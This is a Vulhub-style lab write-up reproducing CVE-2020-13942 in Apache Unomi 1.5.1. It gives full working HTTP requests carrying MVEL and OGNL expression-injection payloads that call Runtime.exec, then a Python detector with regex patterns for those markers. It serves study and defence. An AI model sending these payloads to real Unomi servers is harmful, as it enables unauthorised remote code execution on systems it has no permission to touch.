Vulhub vulnerability reproduction 71: Unomi
2022-07-06 05:17:00 【Revenge_ scan】
CVE-2020-13942: Apache Unomi Remote Expression Code Execution Vulnerability
Vulnerability details
Apache Unomi is a standards-based Customer Data Platform (CDP) used to manage information about online customers and visitors in order to deliver personalized experiences that respect visitor privacy rules. Apache Unomi 1.5.1 and earlier versions contain an expression injection vulnerability: a remote attacker can execute arbitrary commands on the target server through MVEL and OGNL expressions.
Reference links:
- https://www.checkmarx.com/blog/apache-unomi-cve-2020-13942-rce-vulnerabilities-discovered/
- https://github.com/eugenebmx/CVE-2020-13942
Environment setup
Target: 192.168.4.10 (Ubuntu)
Run the following command to start an Apache Unomi 1.5.1 server:
```
docker-compose up -d
```
After the environment starts, the Unomi API is reachable at `http://your-ip:8181` or `https://your-ip:9443`.
Vulnerability reproduction
The vulnerability can be triggered through both port 8181 and port 9443; the following uses 8181 as the example.
1. Execute arbitrary commands through an MVEL expression:
```
POST /context.json HTTP/1.1
Host: localhost:8181
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 483

{
    "filters": [
        {
            "id": "sample",
            "filters": [
                {
                    "condition": {
                        "parameterValues": {
                            "": "script::Runtime r = Runtime.getRuntime(); r.exec(\"touch /tmp/mvel\");"
                        },
                        "type": "profilePropertyCondition"
                    }
                }
            ]
        }
    ],
    "sessionId": "sample"
}
```
2. Execute arbitrary commands through an OGNL expression:
```
POST /context.json HTTP/1.1
Host: localhost:8181
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 1064

{
    "personalizations": [
        {
            "id": "gender-test",
            "strategy": "matching-first",
            "strategyOptions": {
                "fallback": "var2"
            },
            "contents": [
                {
                    "filters": [
                        {
                            "condition": {
                                "parameterValues": {
                                    "propertyName": "(#runtimeclass = #this.getClass().forName(\"java.lang.Runtime\")).(#getruntimemethod = #runtimeclass.getDeclaredMethods().{^ #this.name.equals(\"getRuntime\")}[0]).(#rtobj = #getruntimemethod.invoke(null,null)).(#execmethod = #runtimeclass.getDeclaredMethods().{? #this.name.equals(\"exec\")}.{? #this.getParameters()[0].getType().getName().equals(\"java.lang.String\")}.{? #this.getParameters().length < 2}[0]).(#execmethod.invoke(#rtobj,\"touch /tmp/ognl\"))",
                                    "comparisonOperator": "equals",
                                    "propertyValue": "male"
                                },
                                "type": "profilePropertyCondition"
                            }
                        }
                    ]
                }
            ]
        }
    ],
    "sessionId": "sample"
}
```
Enter the container and you can see that the command was executed successfully:
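On the defending side, the two requests above share a recognisable shape: an injected expression arrives inside a condition's `parameterValues`, either with the `script::` prefix that selects MVEL or as an OGNL expression that declares `#variables` and reaches `Runtime` through reflection. The following Python script is an added example, not part of the original post or of Unomi itself: it walks a `/context.json` body, checks every nested condition for those markers, and returns what it found, which is the kind of check a WAF rule or a log review can apply until the instance is upgraded. The sample requests are constructed here (the OGNL one is shortened from the payload above).

```python
import json
import re

# Markers of the two expression languages abused in CVE-2020-13942, taken from the
# requests above: MVEL via the "script::" prefix; OGNL via #variables and reflection.
SUSPICIOUS = [
    ("mvel-script-prefix", re.compile(r"^\s*script::", re.IGNORECASE)),
    ("ognl-variable", re.compile(r"#[A-Za-z_]\w*\s*=")),
    ("ognl-reflection", re.compile(r"getClass\(\)\s*\.forName|\.invoke\(|getRuntime")),
]

def _walk_conditions(node):
    """Yield every 'condition' object nested anywhere in a /context.json body."""
    if isinstance(node, dict):
        if isinstance(node.get("condition"), dict):
            yield node["condition"]
        for value in node.values():
            yield from _walk_conditions(value)
    elif isinstance(node, list):
        for item in node:
            yield from _walk_conditions(item)

def find_expression_injection(body: str) -> list:
    """Return (condition type, parameter name, rule) for each suspicious parameterValues entry."""
    findings = []
    for cond in _walk_conditions(json.loads(body)):
        params = cond.get("parameterValues")
        if not isinstance(params, dict):
            continue
        for key, value in params.items():
            # Both the parameter name (empty in the MVEL request) and its value are checked.
            for text in (key, value if isinstance(value, str) else ""):
                for rule, pattern in SUSPICIOUS:
                    if pattern.search(text):
                        findings.append((cond.get("type"), key, rule))
                        break
    return findings

def _context_request(parameter_values: dict) -> str:
    """Constructed sample: wrap one profilePropertyCondition in the filters envelope."""
    return json.dumps({"filters": [{"id": "sample", "filters": [{"condition": {
        "parameterValues": parameter_values, "type": "profilePropertyCondition"}}]}],
        "sessionId": "sample"})

BENIGN = _context_request({"propertyName": "properties.gender",
                           "comparisonOperator": "equals", "propertyValue": "male"})
MVEL_SAMPLE = _context_request({"": 'script::Runtime r = Runtime.getRuntime(); r.exec("touch /tmp/mvel");'})
OGNL_SAMPLE = _context_request({"propertyName": '(#rt = #this.getClass().forName("java.lang.Runtime"))',
                                "comparisonOperator": "equals", "propertyValue": "male"})
```

Calling `find_expression_injection` on a captured request body returns an empty list for the benign profile filter and one finding per injected parameter for the MVEL and OGNL samples.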